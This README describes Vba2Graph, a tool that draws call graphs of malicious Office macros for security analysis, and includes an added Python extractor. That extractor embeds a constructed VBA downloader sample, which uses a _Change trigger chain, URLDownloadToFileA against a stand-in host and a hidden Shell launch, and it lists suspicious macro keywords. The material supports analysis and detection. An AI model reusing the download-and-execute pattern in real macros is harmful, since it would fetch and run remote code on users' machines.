Vba2Graph – Generate Call Graphs From VBA Code, For Easier Analysis Of Malicious Documents


A tool for security researchers who spend their time analyzing malicious Office macros.

Generates a VBA call graph, with potentially malicious keywords highlighted.

Allows for quick analysis of malicious macros and easy understanding of the execution flow.


Features

  • Keyword highlighting
  • VBA Properties support
  • External function declaration support
  • Tricky macros with “_Change” execution triggers
  • Fancy color schemes!

Pros

  • Pretty fast
  • Works well on most malicious macros observed in the wild

Cons

  • Static analysis only (dynamically resolved calls, e.g. a procedure name built at runtime from a string, will not be recognized)

Examples
Example 1:
Trickbot downloader – uses an object Resize event as the initial trigger, followed by TextBox_Change triggers.

Example 2:

Check out the Examples folder for more cases.

Installation

Install oletools:

https://github.com/decalage2/oletools/wiki/Install

Install Python Requirements

pip2 install -r requirements.txt

Install Graphviz

Windows
Install Graphviz msi:

https://graphviz.gitlab.io/_pages/Download/Download_windows.html

Add “dot.exe” to the PATH environment variable, or just:

set PATH=%PATH%;C:\Program Files (x86)\Graphviz2.38\bin

Mac

Ubuntu

sudo apt-get install graphviz

Arch

Usage

usage: vba2graph.py [-h] [-o OUTPUT] [-c {0,1,2,3}] (-i INPUT | -f FILE)

optional arguments:
  -h, --help            show this help message and exit
  -o OUTPUT, --output OUTPUT
                        output folder (default: "output")
  -c {0,1,2,3}, --colors {0,1,2,3}
                        color scheme number [0, 1, 2, 3] (default: 0 - B&W)
  -i INPUT, --input INPUT
                        olevba generated file or .bas file
  -f FILE, --file FILE  Office file with macros

Usage Examples (All Platforms)
Only Python 2 is supported:

# Generate call graph directly from an Office file with macros [tnx @doomedraven]
python2 vba2graph.py -f malicious.doc -c 2

# Extract the VBA code with olevba, then pipe it to vba2graph
olevba malicious.doc | python2 vba2graph.py -c 1

# Generate call graph from an already extracted VBA code file
python2 vba2graph.py -i vba_code.bas -o output_folder

Output
You’ll get four folders in your output folder:

  • png: the actual graph image you are looking for
  • svg: the same graph image, just in vector graphics
  • dot: the dot file that was used to create the graph image
  • bas: the VBA procedure code that was recognized by the script (for debugging)
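To make the pipeline above concrete, here is an added example (written for this page in Python 3; it is not Vba2Graph's own Python 2 source) that does in miniature what the tool does: split a macro module into procedures, infer the direct calls between them, infer the implicit edge that a "_Change" trigger creates when another procedure assigns to the control, flag suspicious keywords, and emit a Graphviz dot file. The sample macro, the keyword list, the trigger suffixes and the regular expressions are all assumptions constructed for the example. Like the real tool, it is purely static: a procedure invoked through a name assembled at runtime would appear as an isolated node.

```python
"""Minimal static VBA call-graph extractor (added example, Python 3)."""
import re
from collections import defaultdict

# Constructed sample macro: the shape of a staged downloader, no real payload.
SAMPLE_VBA = r'''
Private Declare PtrSafe Function URLDownloadToFileA Lib "urlmon" (ByVal a As Long, ByVal url As String, ByVal path As String, ByVal r As Long, ByVal c As Long) As Long

Private Sub Document_Open()
    Stage1
End Sub

Private Sub Stage1()
    UserForm1.TextBox1.Text = "x"
End Sub

Private Sub TextBox1_Change()
    Dim p As String
    p = Environ("TEMP") & "\a.exe"
    Call Fetch(p)
End Sub

Private Sub Fetch(p As String)
    URLDownloadToFileA 0, "http://example.invalid/a", p, 0, 0
    Shell p, vbHide
End Sub
'''

# Assumed lists for this example; the real tool ships its own keyword set.
SUSPICIOUS_KEYWORDS = ("Shell", "Environ", "URLDownloadToFile", "CreateObject", "WScript")
TRIGGER_SUFFIXES = ("_open", "_close", "_activate", "_change", "_resize", "_click")

PROC_RE = re.compile(
    r'^[ \t]*(?:(?:Private|Public|Friend)\s+)?(?:Static\s+)?'
    r'(Sub|Function|Property\s+(?:Get|Let|Set))\s+(\w+)\s*\(', re.I | re.M)
END_RE = re.compile(r'^[ \t]*End\s+(?:Sub|Function|Property)\b', re.I | re.M)
DECL_RE = re.compile(
    r'^[ \t]*(?:(?:Private|Public)\s+)?Declare\s+(?:PtrSafe\s+)?'
    r'(?:Sub|Function)\s+(\w+)\s+Lib\s+"([^"]+)"', re.I | re.M)


def split_procedures(vba):
    """Return {name: body_text} for every Sub/Function/Property in the module."""
    procs = {}
    starts = list(PROC_RE.finditer(vba))
    for i, m in enumerate(starts):
        chunk_end = starts[i + 1].start() if i + 1 < len(starts) else len(vba)
        body = vba[m.end():chunk_end]
        end = END_RE.search(body)
        procs[m.group(2)] = body[:end.start()] if end else body
    return procs


def external_declarations(vba):
    """Return {function_name: library} for every Declare statement."""
    return {m.group(1): m.group(2) for m in DECL_RE.finditer(vba)}


def build_call_graph(vba):
    """Return (procs, externals, edges, keywords); edges and keywords map name -> set."""
    procs = split_procedures(vba)
    externals = external_declarations(vba)
    targets = set(procs) | set(externals)
    edges = defaultdict(set)
    keywords = defaultdict(set)
    for name, body in procs.items():
        # Direct call: any other known procedure or Declare'd function named in the body.
        for t in targets:
            if t != name and re.search(r'\b' + re.escape(t) + r'\b', body, re.I):
                edges[name].add(t)
        # Implicit trigger: assigning Control.Text or Control.Value fires Control_Change.
        for t in procs:
            if t != name and t.lower().endswith("_change"):
                control = t[:-len("_Change")]
                if re.search(r'\b' + re.escape(control) + r'\.(?:Text|Value)\s*=', body, re.I):
                    edges[name].add(t)
        for kw in SUSPICIOUS_KEYWORDS:
            if re.search(r'\b' + re.escape(kw), body, re.I):
                keywords[name].add(kw)
    return procs, externals, dict(edges), dict(keywords)


def entry_points(procs):
    """Event handlers that can start execution without being called by other code."""
    return sorted(n for n in procs if n.lower().endswith(TRIGGER_SUFFIXES))


def to_dot(procs, externals, edges, keywords):
    """Render the graph as Graphviz DOT: entry points double-bordered, flagged nodes red."""
    entries = set(entry_points(procs))
    lines = ["digraph vba {", "  rankdir=LR;", "  node [shape=ellipse];"]
    for name in procs:
        attrs = []
        if name in entries:
            attrs.append("peripheries=2")
        if name in keywords:
            attrs.append("color=red")
            attrs.append('label="%s\\n%s"' % (name, ", ".join(sorted(keywords[name]))))
        lines.append('  "%s" [%s];' % (name, ", ".join(attrs)) if attrs else '  "%s";' % name)
    for name, lib in externals.items():
        lines.append('  "%s" [shape=box, label="%s\\n(%s)"];' % (name, name, lib))
    for src in procs:
        for dst in sorted(edges.get(src, ())):
            lines.append('  "%s" -> "%s";' % (src, dst))
    lines.append("}")
    return "\n".join(lines)


if __name__ == "__main__":
    print(to_dot(*build_call_graph(SAMPLE_VBA)))  # render with: dot -Tpng -o graph.png
```

Run it and pipe the output into dot (the same Graphviz binary the installation section sets up) to get the image. On the sample, the chain Document_Open -> Stage1 -> TextBox1_Change -> Fetch -> URLDownloadToFileA is only complete because the Stage1 -> TextBox1_Change edge is inferred from the assignment to TextBox1.Text; a naive "who names whom" search would show two disconnected fragments, which is exactly the trick the "_Change" trigger support exists to defeat.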

Batch Processing

Mac/Linux:
A batch.sh script is included for running olevba and vba2graph over an input folder of malicious docs.
It deletes the output directory first; use with caution.

